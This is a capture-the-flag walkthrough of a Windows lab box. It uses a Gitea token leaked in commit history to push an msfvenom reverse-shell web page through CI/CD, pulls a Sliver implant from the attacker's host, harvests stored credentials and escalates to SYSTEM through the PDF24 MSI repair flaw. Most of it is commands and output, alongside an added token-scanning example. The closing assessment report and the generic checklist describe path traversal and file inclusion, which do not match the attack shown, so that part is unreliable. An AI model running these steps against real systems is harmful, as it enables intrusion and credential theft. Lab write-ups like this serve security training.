🔖 Techniques & Vulnerabilities
🔍 Reconnaissance / Port Scanning
PORT     STATE SERVICE
80/tcp   open  http
445/tcp  open  microsoft-ds
3000/tcp open  ppp
3389/tcp open  ms-wbt-server
5357/tcp open  wsdapi
🎯 Attack Surface Analysis
| Port | Service | Version / Banner |
|---|---|---|
| 80/tcp | http | — |
| 445/tcp | microsoft-ds | — |
| 3000/tcp | ppp | — |
| 3389/tcp | ms-wbt-server | — |
| 5357/tcp | wsdapi | — |
- Content and directory discovery — hidden files, backup archives, development endpoints
- CMS/framework fingerprinting enables targeted CVE research (WordPress, Joomla, Drupal)
- SQL injection — database extraction, authentication bypass, or OS command execution
- Command injection — OS execution via unsanitised parameter handling
- Server-Side Template Injection (SSTI) — code execution through template engine abuse
- Local File Inclusion (LFI) and path traversal — sensitive file disclosure
- Server-Side Request Forgery (SSRF) — pivot to internal services and cloud metadata
- File upload abuse — filter bypass for webshell placement
- XML External Entity injection (XXE) in XML-consuming endpoints
- Authentication and session weaknesses — weak passwords, predictable tokens
- Default credential testing for Grafana and similar dashboards
- Grafana directory traversal and plugin CVE research in older versions
- API token enumeration and unauthorised data source access
- Enumerate service version for known CVEs
- Test default/weak credentials
- Review protocol-specific attack techniques
📖 Walkthrough
Reconnaissance
Port Scanning
As always, xct had already provided the list of ports, so there was no need to cause traffic spikes with a port scan.
PORT STATE SERVICE
80/tcp open http
445/tcp open microsoft-ds
3000/tcp open ppp
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
SMB Enumeration
I did a quick check on SMB but got no unauthenticated access.
┌──(kali㉿kali)-[~]
└─$ netexec smb 10.10.87.100 -u '' -p '' --shares
SMB 10.10.87.100 445 LOCK [*] Windows 10.0 Build 20348 (name:LOCK) (domain:Lock) (signing:False) (SMBv1:False)
SMB 10.10.87.100 445 LOCK [-] Lock\: STATUS_ACCESS_DENIED
SMB 10.10.87.100 445 LOCK [-] Error getting user: list index out of range
SMB 10.10.87.100 445 LOCK [-] Error enumerating shares: Error occurs while reading from remote(104)
┌──(kali㉿kali)-[~]
└─$ netexec smb 10.10.87.100 -u 'Guest' -p '' --shares
SMB 10.10.87.100 445 LOCK [*] Windows 10.0 Build 20348 (name:LOCK) (domain:Lock) (signing:False) (SMBv1:False)
SMB 10.10.87.100 445 LOCK [-] Lock\Guest: STATUS_ACCOUNT_DISABLED
Enumeration of Port 80/TCP
Port 80/TCP ran a random website with nothing of interest on it.
┌──(kali㉿kali)-[~]
└─$ whatweb http://10.10.87.100/
http://10.10.87.100/ [200 OK] Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Microsoft-IIS/10.0], IP[10.10.87.100], Lightbox, Microsoft-IIS[10.0], Script, Title[Lock - Index], X-Powered-By[ASP.NET]
Enumeration of Port 3000/TCP
On port 3000/TCP I found a Gitea instance and started enumerating it.
┌──(kali㉿kali)-[~]
└─$ whatweb http://10.10.87.100:3000/
http://10.10.87.100:3000/ [200 OK] Cookies[_csrf,i_like_gitea], Country[RESERVED][ZZ], HTML5, HttpOnly[_csrf,i_like_gitea], IP[10.10.87.100], Meta-Author[Gitea - Git with a cup of tea], Open-Graph-Protocol[website], PoweredBy[Gitea], Script, Title[Gitea: Git with a cup of tea], X-Frame-Options[SAMEORIGIN]
Checking the Explore button showed the user ellen.freeman with a public repository called dev-scripts.

| Username |
|---|
| ellen.freeman |
The repository contained a Python script to authenticate with Gitea and display all repositories available to the user.


As always, I checked the history of the repository. There was one more commit, which contained a PERSONALACCESSTOKEN.


| PERSONALACCESSTOKEN |
|---|
| 43ce39bb0bd6bc489284f2905f033ca467a6362f |
┌──(kali㉿kali)-[/media/…/Vulnlab/Machines/Lock/files]
└─$ cat repos.py
```python
import requests
import sys

# store this in env instead at some point
PERSONAL_ACCESS_TOKEN = '43ce39bb0bd6bc489284f2905f033ca467a6362f'


def format_domain(domain):
    # Prepend a scheme if the caller passed a bare host name
    if not domain.startswith(('http://', 'https://')):
        domain = 'https://' + domain
    return domain


def get_repositories(token, domain):
    # Gitea API: list the repositories the token's owner can access
    headers = {
        'Authorization': f'token {token}'
    }
    url = f'{domain}/api/v1/user/repos'
    response = requests.get(url, headers=headers)
    if response.status_code == 200:
        return response.json()
    else:
        raise Exception(f'Failed to retrieve repositories: {response.status_code}')


def main():
    if len(sys.argv) < 2:
        print("Usage: python script.py <gitea_domain>")
        sys.exit(1)
    gitea_domain = format_domain(sys.argv[1])
    try:
        repos = get_repositories(PERSONAL_ACCESS_TOKEN, gitea_domain)
        print("Repositories:")
        for repo in repos:
            print(f"- {repo['full_name']}")
    except Exception as e:
        print(f"Error: {e}")


if __name__ == "__main__":
    main()
```
By running the version of the script from the initial commit, which still contained the PERSONALACCESSTOKEN, I was able to find another repository called website.
┌──(kali㉿kali)-[/media/…/Vulnlab/Machines/Lock/files]
└─$ python3 repos.py http://10.10.87.100:3000
Repositories:
- ellen.freeman/dev-scripts
- ellen.freeman/website
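The leak above is the classic case of a token that was committed once and later removed, yet remains readable in history. The following is an added example, not code from the write-up or from the dev-scripts repository: a scanner over `git log -p --reverse` output that records where each credential-looking 40-hex token entered and left the tree. The log excerpt and the token value are constructed.

```python
"""Added example (not part of the original write-up): scan `git log -p --reverse`
output for hard-coded tokens and record the commit that introduced each one and,
if any, the commit that removed it. A removed token is still in history."""
import re
from dataclasses import dataclass
from typing import Optional

# Gitea (and GitHub classic) personal access tokens are 40 hex characters. The
# credential-like name in front keeps ordinary SHA-1 object ids out of the hits.
TOKEN_RE = re.compile(
    r"(?i)(?:token|secret|password|api_key)\W{0,3}['\"]?([0-9a-f]{40})['\"]?")


@dataclass
class Finding:
    token: str
    path: str
    added_in: str
    removed_in: Optional[str] = None  # None: still present at the tip of the log


def scan_git_log(log_text: str) -> list:
    """Walk the log (oldest commit first) and return one Finding per (token, file)."""
    findings = {}
    commit = path = None
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("+++ "):            # file the following hunks belong to
            path = line[4:]
            path = path[2:] if path.startswith("b/") else path
        elif line.startswith("+") and not line.startswith("+++"):
            for m in TOKEN_RE.finditer(line[1:]):
                findings.setdefault((m.group(1), path),
                                    Finding(m.group(1), path, commit))
        elif line.startswith("-") and not line.startswith("---"):
            for m in TOKEN_RE.finditer(line[1:]):
                f = findings.get((m.group(1), path))
                if f is not None and f.removed_in is None:
                    f.removed_in = commit
    return list(findings.values())


def report(findings) -> list:
    """One line per finding. Rewriting history does not un-leak a token that
    anyone could already have cloned, so the fix is always to revoke it."""
    out = []
    for f in findings:
        state = (f"removed in {f.removed_in[:7]} but still in history"
                 if f.removed_in else "present at tip")
        out.append(f"{f.path}: {f.token[:6]}... added in {f.added_in[:7]}, "
                   f"{state}; revoke it")
    return out


# Constructed sample in `git log -p --reverse` shape, mirroring the page: the
# token is committed, then moved to an environment variable. Value is made up.
SAMPLE_LOG = """\
commit 1111111111111111111111111111111111111111
diff --git a/repos.py b/repos.py
--- /dev/null
+++ b/repos.py
@@ -0,0 +1,3 @@
+import requests
+# store this in env instead at some point
+PERSONAL_ACCESS_TOKEN = '0123456789abcdef0123456789abcdef01234567'

commit 2222222222222222222222222222222222222222
diff --git a/repos.py b/repos.py
--- a/repos.py
+++ b/repos.py
@@ -1,3 +1,3 @@
 import requests
-# store this in env instead at some point
-PERSONAL_ACCESS_TOKEN = '0123456789abcdef0123456789abcdef01234567'
+import os
+PERSONAL_ACCESS_TOKEN = os.environ['GITEA_TOKEN']
"""

if __name__ == "__main__":
    print("\n".join(report(scan_git_log(SAMPLE_LOG))))
```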
Foothold
I cloned the repository to see what was inside.
┌──(kali㉿kali)-[/media/…/Vulnlab/Machines/Lock/files]
└─$ git clone http://ellen.freeman:43ce39bb0bd6bc489284f2905f033ca467a6362f@10.10.87.100:3000/ellen.freeman/website.git
Cloning into 'website'...
remote: Enumerating objects: 165, done.
remote: Counting objects: 100% (165/165), done.
remote: Compressing objects: 100% (128/128), done.
remote: Total 165 (delta 35), reused 153 (delta 31), pack-reused 0
Receiving objects: 100% (165/165), 7.16 MiB | 1.78 MiB/s, done.
Resolving deltas: 100% (35/35), done.
Updating files: 100% (126/126), done.
The readme.md pointed out that all submitted files would automatically be deployed to the webserver via Continuous Integration and Continuous Delivery (CI/CD).
┌──(kali㉿kali)-[/media/…/Machines/Lock/files/website]
└─$ cat readme.md
# New Project Website
CI/CD integration is now active - changes to the repository will automatically be deployed to the webserver
For the foothold I generated an ASPX reverse shell using msfvenom.
┌──(kali㉿kali)-[/media/…/Machines/Lock/files/website]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.0.2 LPORT=8443 -f aspx -o shell.aspx
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3396 bytes
Saved as: shell.aspx
I configured the repository locally and added the file using basic git commands.
┌──(kali㉿kali)-[/media/…/Machines/Lock/files/website]
└─$ git add .
fatal: detected dubious ownership in repository at '/media/sf_infosec/InfoSec/Vulnlab/Machines/Lock/files/website'
To add an exception for this directory, call:
git config --global --add safe.directory /media/sf_infosec/InfoSec/Vulnlab/Machines/Lock/files/website
┌──(kali㉿kali)-[/media/…/Machines/Lock/files/website]
└─$ git config --global --add safe.directory /media/sf_infosec/InfoSec/Vulnlab/Machines/Lock/files/website
┌──(kali㉿kali)-[/media/…/Machines/Lock/files/website]
└─$ git config --global user.name "ellen.freeman"
┌──(kali㉿kali)-[/media/…/Machines/Lock/files/website]
└─$ git config --global user.email [email protected]
┌──(kali㉿kali)-[/media/…/Machines/Lock/files/website]
└─$ git commit -m "added shell.aspx"
[main d01689b] added shell.aspx
1 file changed, 45 insertions(+)
create mode 100644 shell.aspx
As the last step I pushed the changes to the remote repository using the PERSONALACCESSTOKEN I had found earlier.
┌──(kali㉿kali)-[/media/…/Machines/Lock/files/website]
└─$ git push http://43ce39bb0bd6bc489284f2905f033ca467a6362f@10.10.87.100:3000/ellen.freeman/website.git
Enumerating objects: 4, done.
Counting objects: 100% (4/4), done.
Delta compression using up to 4 threads
Compressing objects: 100% (3/3), done.
Writing objects: 100% (3/3), 1.42 KiB | 728.00 KiB/s, done.
Total 3 (delta 1), reused 0 (delta 0), pack-reused 0
remote: . Processing 1 references
remote: Processed 1 references in total
To http://10.10.87.100:3000/ellen.freeman/website.git
73cdcc1..d01689b main -> main
To trigger the payload I just had to access it using my browser.
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 8443
listening on [any] 8443 ...
connect to [10.8.0.2] from (UNKNOWN) [10.10.87.100] 50311
Microsoft Windows [Version 10.0.20348.2159]
(c) Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>
Persistence
I performed my basic Tactics, Techniques and Procedures (TTPs) for gaining a foothold to make sure I don't kill my shell by accident.
┌──(kali㉿kali)-[~]
└─$ sliver
Connecting to localhost:31337 ...
[*] Loaded 20 aliases from disk
[*] Loaded 104 extension(s) from disk
All hackers gain living weapon
[*] Server v1.5.41 - f2a3915c79b31ab31c0c2f0428bbd53d9e93c54b
[*] Welcome to the sliver shell, please type 'help' for options
[*] Check for updates with the 'update' command
sliver >
sliver > generate --http 10.8.0.2:8888 --os windows --arch amd64 --disable-sgn --format exe --save /media/sf_infosec/InfoSec/Vulnlab/Machines/Lock/serve/sliver.exe
[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 30s
[*] Implant saved to /media/sf_infosec/InfoSec/Vulnlab/Machines/Lock/serve/sliver.exe
sliver > http --lport 8888
[*] Starting HTTP :8888 listener ...
[*] Successfully started job #1
┌──(kali㉿kali)-[/media/…/Vulnlab/Machines/Lock/serve]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
PS C:\temp> iwr 10.8.0.2:8000/sliver.exe -o sliver.exe
iwr 10.8.0.2:8000/sliver.exe -o sliver.exe
[*] Session 11a3cbbb OVERSEAS_APPEAL - 10.10.87.100:50483 (Lock) - windows/amd64 - Sat, 23 Mar 2024 06:46:00 EDT
Enumeration
After completing the persistence setup I moved forward with some basic enumeration.
PS C:\> whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
================== ==============================================
lock\ellen.freeman S-1-5-21-3479006486-3698385926-2473385619-1000
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============================================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
IIS APPPOOL\DefaultAppPool Well-known group S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ================================== ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
In C:\Users\ I found a potential target for privilege escalation called Gale Dekarios.
PS C:\Users> dir
dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/27/2023 2:00 PM .NET v4.5
d----- 12/27/2023 2:00 PM .NET v4.5 Classic
d----- 12/27/2023 12:01 PM Administrator
d----- 12/28/2023 11:36 AM ellen.freeman
d----- 12/28/2023 6:14 AM gale.dekarios
d-r--- 12/27/2023 10:21 AM Public
| Username |
|---|
| gale.dekarios |
Since I could only access the home directory of the current user, Ellen Freeman, I took a closer look at each of its folders.
PS C:\Users\ellen.freeman> dir
dir
Directory: C:\Users\ellen.freeman
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/27/2023 11:11 AM .ssh
d-r--- 12/28/2023 5:58 AM 3D Objects
d-r--- 12/28/2023 5:58 AM Contacts
d-r--- 12/28/2023 6:11 AM Desktop
d-r--- 12/28/2023 5:59 AM Documents
d-r--- 12/28/2023 5:58 AM Downloads
d-r--- 12/28/2023 5:58 AM Favorites
d-r--- 12/28/2023 5:58 AM Links
d-r--- 12/28/2023 5:58 AM Music
d-r--- 12/28/2023 5:58 AM Pictures
d-r--- 12/28/2023 5:58 AM Saved Games
d-r--- 12/28/2023 5:58 AM Searches
d-r--- 12/28/2023 5:58 AM Videos
-a---- 12/28/2023 11:38 AM 52 .git-credentials
-a---- 12/28/2023 11:35 AM 158 .gitconfig
The file .git-credentials contained the user's actual credentials, but they were of no use at this point.
PS C:\Users\ellen.freeman> type .git-credentials
type .git-credentials
http://ellen.freeman:YWFrWJk9uButLeqx@localhost:3000
| Username | Password |
|---|---|
| ellen.freeman | YWFrWJk9uButLeqx |
The Documents folder, however, contained a config.xml, which turned out to be a configuration file for the tool mRemoteNG.
PS C:\Users\ellen.freeman\Documents> dir
dir
Directory: C:\Users\ellen.freeman\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/28/2023 5:59 AM 3341 config.xml
PS C:\Users\ellen.freeman\Documents> type config.xml
type config.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="sDkrKn0JrG4oAL4GW8BctmMNAJfcdu/ahPSQn3W5DPC3vPRiNwfo7OH11trVPbhwpy+1FnqfcPQZ3olLRy+DhDFp" ConfVersion="2.6">
<Node Name="RDP/Gale" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="a179606a-a854-48a6-9baa-491d8eb3bddc" Username="Gale.Dekarios" Domain="" Password="TYkZkvR2YmVlm2T2jBYTEhPU2VafgW1d9NSdDX+hUYwBePQ/2qKx+57IeOROXhJxA7CczQzr1nRm89JulQDWPw==" Hostname="Lock" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" 
InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
</mrng:Connections>
Privilege Escalation
CVE-2023-49147: PDF24 Creator 11.15.1 Local Privilege Escalation
I did some research on it and found a matching Local Privilege Escalation (LPE) on Packet Storm. Good stuff indeed.
Proof of concept:
-----------------
1) Local Privilege Escalation via MSI installer (CVE-2023-49147)
For the exploit to work, the PDF24 Creator has to be installed via the MSI file.
Afterwards, any low-privileged user can run the following command to start the
repair of PDF24 Creator and trigger the vulnerable actions without a UAC popup:
msiexec.exe /fa <PATH TO INSTALLERFILE>\pdf24-creator-11.14.0-x64.msi
At the very end of the repair process, the sub-process pdf24-PrinterInstall.exe gets called with SYSTEM privileges and performs a write action on the file
"C:\Program Files\PDF24\faxPrnInst.log". This can be used by an attacker by simply setting an oplock on the file as soon as it gets read. To do that, one can use the 'SetOpLock.exe' tool from "https://github.com/googleprojectzero/symboliclink-testing-tools"
with the following parameters:
SetOpLock.exe "C:\Program Files\PDF24\faxPrnInst.log" r
If the oplock is set, the cmd window that gets opened when pdf24-PrinterInstall.exe is executed doesn't close. The attacker can then perform the following actions to spawn a SYSTEM shell:
- right click on the top bar of the cmd window
- click on properties
- under options click on the "Legacyconsolemode" link
- open the link with a browser other than internet explorer or edge (both don't open as SYSTEM when on Win11)
- in the opened browser window press the key combination CTRL+o
- type cmd.exe in the top bar and press Enter
To start with the steps of the PoC I downloaded the mentioned tools and copied SetOpLock.exe to the box.
As a first step I set up the oplock inside a cmd shell.

Next I opened another cmd shell and started the repair process.
C:\Users\gale.dekarios>msiexec.exe /fa C:\_install\pdf24-creator-11.15.1-x64.msi

In the following dialog I chose the second option, which avoided a reboot at the end; skipping the reboot was required to reach the relevant stage of the exploitation.

The repair process took some time but at the end, the cmd shell had stopped as expected.


I followed the steps and right clicked the window bar to enter the properties menu.

After clicking on the link for legacy console mode I had to choose which browser should be used for opening the link. According to the PoC I selected Firefox.

Pressing Ctrl+O opened a new Explorer window, into whose address bar I typed cmd.exe and hit Enter. A new cmd shell opened with NT AUTHORITY\SYSTEM privileges.

As before and for documentation purposes, I spawned another Sliver session by accessing my payload in C:\temp\.
[*] Session f3bc4aa9 OVERSEAS_APPEAL - 10.10.87.100:55775 (Lock) - windows/amd64 - Sat, 23 Mar 2024 08:09:14 EDT
sliver > sessions
ID Name Transport Remote Address Hostname Username Operating System Locale Last Message Health
========== ================= =========== ==================== ========== ===================== ================== ======== ======================================= =========
f3bc4aa9 OVERSEAS_APPEAL http(s) 10.10.87.100:55775 Lock NT AUTHORITY\SYSTEM windows/amd64 en-US Sat Mar 23 08:09:17 EDT 2024 (1s ago) [ALIVE]
user.txt
The user Gale Dekarios held the user.txt which I accessed via Sliver for documentation purposes.
sliver (OVERSEAS_APPEAL) > ls
C:\Users\gale.dekarios\Desktop (2 items, 318 B)
===============================================
-rw-rw-rw- desktop.ini 282 B Thu Dec 28 07:14:54 -0700 2023
-rw-rw-rw- user.txt 36 B Thu Dec 28 07:15:03 -0700 2023
sliver (OVERSEAS_APPEAL) > cat user.txt
VL{REDACTED}
Pivoting
While repeating the basic enumeration for the new user during the pivoting phase, I stumbled upon PDF24.
PS C:\> reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SecurityHealth REG_EXPAND_SZ %windir%\system32\SecurityHealthSystray.exe
VMware User Process REG_SZ "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
AzureArcSetup REG_EXPAND_SZ %windir%\AzureArcSetup\Systray\AzureArcSysTray.exe
PDF24 REG_SZ "C:\Program Files\PDF24\pdf24.exe"
To dig deeper into it I moved Seatbelt to the box. Shout out to Flangvik for maintaining his amazing repository!
PS C:\temp> .\Seatbelt.exe -group=system
.\Seatbelt.exe -group=system
Seatbelt v1.2.2
====== Processes ======
Collecting Non Microsoft Processes (via WMI)
ProcessName : pdf24
ProcessId : 4940
ParentProcessId : 3636
CompanyName : geek software GmbH
Description : PDF24 Backend
Version : 11.15.1
Path : C:\Program Files\PDF24\pdf24.exe
CommandLine : "C:\Program Files\PDF24\pdf24.exe"
IsDotNet : False
ProcessProtectionInformation :
====== Services ======
Non Microsoft Services (via WMI)
<--- CUT FOR BREVITY --->
Name : PDF24
DisplayName : PDF24
Description : PDF24 Printer Service
User : LocalSystem
State : Running
StartMode : Auto
Type : Own Process
ServiceCommand : "C:\Program Files\PDF24\pdf24.exe" -service
BinaryPath : C:\Program Files\PDF24\pdf24.exe
BinaryPathSDDL : O:SYD:AI(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU)(A;ID;0x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
ServiceDll :
ServiceSDDL : O:SYD:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)
CompanyName : geek software GmbH
FileDescription : PDF24 Backend
Version : 11.15.1
IsDotNet : False
Since I was not able to restart the service, I started looking for hidden files from the root of the Windows drive downward and found a hidden folder called _install.
PS C:\> GCI -hidden
GCI -hidden
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/28/2023 6:17 AM $Recycle.Bin
d--h-- 12/27/2023 12:38 PM $WinREAgent
d--hsl 12/27/2023 6:14 PM Documents and Settings
d--h-- 12/28/2023 11:24 AM ProgramData
d--hs- 12/27/2023 6:14 PM Recovery
d--hs- 12/27/2023 6:14 PM System Volume Information
d--h-- 12/28/2023 11:23 AM _install
-a-hs- 3/23/2024 2:47 AM 12288 DumpStack.log.tmp
-a-hs- 3/23/2024 2:47 AM 1207959552 pagefile.sys
Inside the directory I found the file pdf24-creator-11.15.1-x64.msi which was used for installing PDF24.
PS C:\_install> dir
dir
Directory: C:\_install
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/28/2023 11:21 AM 60804608 Firefox Setup 121.0.msi
-a---- 12/28/2023 5:39 AM 43593728 mRemoteNG-Installer-1.76.20.24615.msi
-a---- 12/14/2023 10:07 AM 462602240 pdf24-creator-11.15.1-x64.msi
root.txt
sliver (OVERSEAS_APPEAL) > cat C:\\Users\\Administrator\\Desktop\\root.txt
VL{REDACTED}
📋 Security Assessment Report
Description
During the penetration test, it was discovered that the application constructed file system paths using user-supplied parameters without adequate sanitisation or path canonicalisation. By injecting path traversal sequences into the vulnerable parameter, it was possible to traverse outside the intended directory and read arbitrary files from the server file system.
Impact
An attacker can read arbitrary files accessible to the web application process — including database credentials, application API keys, SSH private keys from user home directories, and system files such as /etc/passwd and /etc/shadow. Credentials discovered through file inclusion were used during this engagement to gain authenticated access to additional services. In PHP applications, log poisoning chains this vulnerability to full remote code execution.